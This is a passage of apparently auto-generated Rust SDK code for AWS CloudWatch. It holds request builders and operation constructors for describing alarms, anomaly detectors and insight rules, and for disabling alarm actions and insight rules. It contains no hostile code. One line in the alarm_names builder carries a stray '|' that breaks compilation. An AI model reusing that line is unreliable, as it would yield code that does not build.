/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub fn children_of_alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.children_of_alarm_name = Some(input.into());
self
}
pub fn set_children_of_alarm_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.children_of_alarm_name = input;
self
}
/// <p>If you use this parameter and specify the name of a metric or composite alarm, the operation returns
/// information about the "parent" alarms
/// of the alarm you specify. These are the composite alarms that have <code>AlarmRule</code>
/// parameters that reference
/// the alarm named in <code>ParentsOfAlarmName</code>. Information about the alarm that you specify in
/// <code>ParentsOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ParentsOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you receive a validation
/// error.</p>
/// <note>
/// <p>Only the Alarm Name and ARN are returned by this operation when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
/// the parent alarm names in the <code>AlarmNames</code> parameter.</p>
/// </note>
pub fn parents_of_alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.parents_of_alarm_name = Some(input.into());
self
}
pub fn set_parents_of_alarm_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.parents_of_alarm_name = input;
self
}
/// <p>Specify this parameter to receive information only about alarms that are currently in the state that you specify.</p>
pub fn state_value(mut self, input: crate::model::StateValue) -> Self {
self.state_value = Some(input);
self
}
pub fn set_state_value(
mut self,
input: std::option::Option<crate::model::StateValue>,
) -> Self {
self.state_value = input;
self
}
/// <p>Use this parameter to filter the results of the operation to only those alarms that
/// use a certain alarm action. For example, you could specify the ARN of an SNS topic to find all
/// alarms that send notifications to that topic.</p>
pub fn action_prefix(mut self, input: impl Into<std::string::String>) -> Self {
self.action_prefix = Some(input.into());
self
}
pub fn set_action_prefix(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.action_prefix = input;
self
}
/// <p>The maximum number of alarm descriptions to retrieve.</p>
pub fn max_records(mut self, input: i32) -> Self {
self.max_records = Some(input);
self
}
pub fn set_max_records(mut self, input: std::option::Option<i32>) -> Self {
self.max_records = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// Consumes the builder and constructs a [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAlarmsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAlarmsInput {
alarm_names: self.alarm_names,
alarm_name_prefix: self.alarm_name_prefix,
alarm_types: self.alarm_types,
children_of_alarm_name: self.children_of_alarm_name,
parents_of_alarm_name: self.parents_of_alarm_name,
state_value: self.state_value,
action_prefix: self.action_prefix,
max_records: self.max_records,
next_token: self.next_token,
})
}
}
}
#[doc(hidden)]
pub type DescribeAlarmsInputOperationOutputAlias = crate::operation::DescribeAlarms;
#[doc(hidden)]
pub type DescribeAlarmsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAlarmsInput {
/// Consumes the builder and constructs an Operation<[`DescribeAlarms`](crate::operation::DescribeAlarms)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAlarms,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_alarms(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAlarms::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAlarms",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
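///
/// A minimal usage sketch. The consuming-crate name `aws_sdk_cloudwatch` is an
/// assumption (hence the `ignore` fence); only setters defined on this builder are used.
///
/// ```ignore
/// // Describe up to 50 alarms whose names start with "prod-".
/// // `alarm_name_prefix` cannot be combined with `alarm_names`.
/// let input = aws_sdk_cloudwatch::input::DescribeAlarmsInput::builder()
///     .alarm_name_prefix("prod-")
///     .max_records(50)
///     .build()
///     .expect("valid DescribeAlarmsInput");
/// ```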
pub fn builder() -> crate::input::describe_alarms_input::Builder {
crate::input::describe_alarms_input::Builder::default()
}
}
/// See [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
pub mod describe_alarms_for_metric_input {
/// A builder for [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) statistic: std::option::Option<crate::model::Statistic>,
pub(crate) extended_statistic: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) period: std::option::Option<i32>,
pub(crate) unit: std::option::Option<crate::model::StandardUnit>,
}
impl Builder {
/// <p>The name of the metric.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
/// <p>The namespace of the metric.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The statistic for the metric, other than percentiles.
/// For percentile statistics, use <code>ExtendedStatistics</code>.</p>
pub fn statistic(mut self, input: crate::model::Statistic) -> Self {
self.statistic = Some(input);
self
}
pub fn set_statistic(
mut self,
input: std::option::Option<crate::model::Statistic>,
) -> Self {
self.statistic = input;
self
}
/// <p>The percentile statistic for the metric. Specify a value between
/// p0.0 and p100.</p>
pub fn extended_statistic(mut self, input: impl Into<std::string::String>) -> Self {
self.extended_statistic = Some(input.into());
self
}
pub fn set_extended_statistic(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.extended_statistic = input;
self
}
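/// <p>The dimensions associated with the metric. If the metric has any associated
/// dimensions, you must specify them in order for the call to succeed.</p>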
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The period, in seconds, over which the statistic is applied.</p>
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
/// <p>The unit for the metric.</p>
pub fn unit(mut self, input: crate::model::StandardUnit) -> Self {
self.unit = Some(input);
self
}
pub fn set_unit(mut self, input: std::option::Option<crate::model::StandardUnit>) -> Self {
self.unit = input;
self
}
/// Consumes the builder and constructs a [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAlarmsForMetricInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAlarmsForMetricInput {
metric_name: self.metric_name,
namespace: self.namespace,
statistic: self.statistic,
extended_statistic: self.extended_statistic,
dimensions: self.dimensions,
period: self.period,
unit: self.unit,
})
}
}
}
#[doc(hidden)]
pub type DescribeAlarmsForMetricInputOperationOutputAlias =
crate::operation::DescribeAlarmsForMetric;
#[doc(hidden)]
pub type DescribeAlarmsForMetricInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAlarmsForMetricInput {
/// Consumes the builder and constructs an Operation<[`DescribeAlarmsForMetric`](crate::operation::DescribeAlarmsForMetric)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAlarmsForMetric,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_alarms_for_metric(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAlarmsForMetric::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAlarmsForMetric",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAlarmsForMetricInput`](crate::input::DescribeAlarmsForMetricInput)
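///
/// A minimal usage sketch (the crate name `aws_sdk_cloudwatch` and the
/// `Statistic::Average` variant name are assumptions, hence the `ignore` fence):
///
/// ```ignore
/// // Find alarms watching the Average of a specific EC2 metric.
/// let input = aws_sdk_cloudwatch::input::DescribeAlarmsForMetricInput::builder()
///     .metric_name("CPUUtilization")
///     .namespace("AWS/EC2")
///     .statistic(aws_sdk_cloudwatch::model::Statistic::Average)
///     .build()
///     .expect("valid DescribeAlarmsForMetricInput");
/// ```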
pub fn builder() -> crate::input::describe_alarms_for_metric_input::Builder {
crate::input::describe_alarms_for_metric_input::Builder::default()
}
}
/// See [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
pub mod describe_anomaly_detectors_input {
/// A builder for [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) max_results: std::option::Option<i32>,
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
}
impl Builder {
/// <p>Use the token returned by the previous operation to request the next page of results.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The maximum number of results to return in one operation. The maximum
/// value that you can specify is 100.</p>
/// <p>To retrieve the remaining results, make another call with the returned
/// <code>NextToken</code> value. </p>
pub fn max_results(mut self, input: i32) -> Self {
self.max_results = Some(input);
self
}
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.max_results = input;
self
}
/// <p>Limits the results to only the anomaly detection models that
/// are associated with the specified namespace.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>Limits the results to only the anomaly detection models that are associated with the
/// specified metric name. If there are multiple metrics with this name in different
/// namespaces that have anomaly detection models, they're all returned.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
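/// <p>Limits the results to only the anomaly detection models that are associated with the
/// specified metric dimensions.</p>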
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// Consumes the builder and constructs a [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAnomalyDetectorsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAnomalyDetectorsInput {
next_token: self.next_token,
max_results: self.max_results,
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
})
}
}
}
#[doc(hidden)]
pub type DescribeAnomalyDetectorsInputOperationOutputAlias =
crate::operation::DescribeAnomalyDetectors;
#[doc(hidden)]
pub type DescribeAnomalyDetectorsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAnomalyDetectorsInput {
/// Consumes the builder and constructs an Operation<[`DescribeAnomalyDetectors`](crate::operation::DescribeAnomalyDetectors)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAnomalyDetectors,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_anomaly_detectors(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAnomalyDetectors::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAnomalyDetectors",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAnomalyDetectorsInput`](crate::input::DescribeAnomalyDetectorsInput)
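///
/// A minimal usage sketch (the crate name `aws_sdk_cloudwatch` is an assumption):
///
/// ```ignore
/// // List anomaly detection models for one metric, ten per page; pass the
/// // returned `NextToken` back via `next_token(...)` for subsequent pages.
/// let input = aws_sdk_cloudwatch::input::DescribeAnomalyDetectorsInput::builder()
///     .namespace("AWS/Lambda")
///     .metric_name("Duration")
///     .max_results(10)
///     .build()
///     .expect("valid DescribeAnomalyDetectorsInput");
/// ```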
pub fn builder() -> crate::input::describe_anomaly_detectors_input::Builder {
crate::input::describe_anomaly_detectors_input::Builder::default()
}
}
/// See [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
pub mod describe_insight_rules_input {
/// A builder for [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) max_results: std::option::Option<i32>,
}
impl Builder {
/// <p>Include this value, if it was returned by the previous operation, to get the next set of rules.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The maximum number of results to return in one operation. If you omit this
/// parameter, the default of 500 is used.</p>
pub fn max_results(mut self, input: i32) -> Self {
self.max_results = Some(input);
self
}
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.max_results = input;
self
}
/// Consumes the builder and constructs a [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeInsightRulesInput {
next_token: self.next_token,
max_results: self.max_results,
})
}
}
}
#[doc(hidden)]
pub type DescribeInsightRulesInputOperationOutputAlias = crate::operation::DescribeInsightRules;
#[doc(hidden)]
pub type DescribeInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`DescribeInsightRules`](crate::operation::DescribeInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_insight_rules(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeInsightRulesInput`](crate::input::DescribeInsightRulesInput)
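///
/// A minimal usage sketch (the crate name `aws_sdk_cloudwatch` is an assumption):
///
/// ```ignore
/// // Fetch the first page of up to 25 Contributor Insights rules.
/// let input = aws_sdk_cloudwatch::input::DescribeInsightRulesInput::builder()
///     .max_results(25)
///     .build()
///     .expect("valid DescribeInsightRulesInput");
/// ```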
pub fn builder() -> crate::input::describe_insight_rules_input::Builder {
crate::input::describe_insight_rules_input::Builder::default()
}
}
/// See [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
pub mod disable_alarm_actions_input {
/// A builder for [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
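/// <p>The names of the alarms. Each call appends one name; use
/// <code>set_alarm_names</code> to replace the whole list.</p>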
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self | }
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// Consumes the builder and constructs a [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DisableAlarmActionsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DisableAlarmActionsInput {
alarm_names: self.alarm_names,
})
}
}
}
#[doc(hidden)]
pub type DisableAlarmActionsInputOperationOutputAlias = crate::operation::DisableAlarmActions;
#[doc(hidden)]
pub type DisableAlarmActionsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DisableAlarmActionsInput {
/// Consumes the builder and constructs an Operation<[`DisableAlarmActions`](crate::operation::DisableAlarmActions)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DisableAlarmActions,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_disable_alarm_actions(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DisableAlarmActions::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DisableAlarmActions",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DisableAlarmActionsInput`](crate::input::DisableAlarmActionsInput)
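///
/// A minimal usage sketch (the crate name `aws_sdk_cloudwatch` is an assumption). The
/// same pattern applies to `EnableAlarmActionsInput`, `DisableInsightRulesInput`, and
/// `EnableInsightRulesInput`, which expose the same single-list builder shape.
///
/// ```ignore
/// // Each `alarm_names` call appends one name to the list.
/// let input = aws_sdk_cloudwatch::input::DisableAlarmActionsInput::builder()
///     .alarm_names("prod-cpu-high")
///     .alarm_names("prod-disk-full")
///     .build()
///     .expect("valid DisableAlarmActionsInput");
/// ```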
pub fn builder() -> crate::input::disable_alarm_actions_input::Builder {
crate::input::disable_alarm_actions_input::Builder::default()
}
}
/// See [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
pub mod disable_insight_rules_input {
/// A builder for [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
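/// <p>An array of the rule names to disable. If you need to find out the names of your
/// rules, use <code>DescribeInsightRules</code>.</p>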
pub fn rule_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.rule_names.unwrap_or_default();
v.push(input.into());
self.rule_names = Some(v);
self
}
pub fn set_rule_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.rule_names = input;
self
}
/// Consumes the builder and constructs a [`DisableInsightRulesInput`](crate::input::DisableInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DisableInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DisableInsightRulesInput {
rule_names: self.rule_names,
})
}
}
}
#[doc(hidden)]
pub type DisableInsightRulesInputOperationOutputAlias = crate::operation::DisableInsightRules;
#[doc(hidden)]
pub type DisableInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DisableInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`DisableInsightRules`](crate::operation::DisableInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DisableInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_disable_insight_rules(&self)
.map_err(|err| {
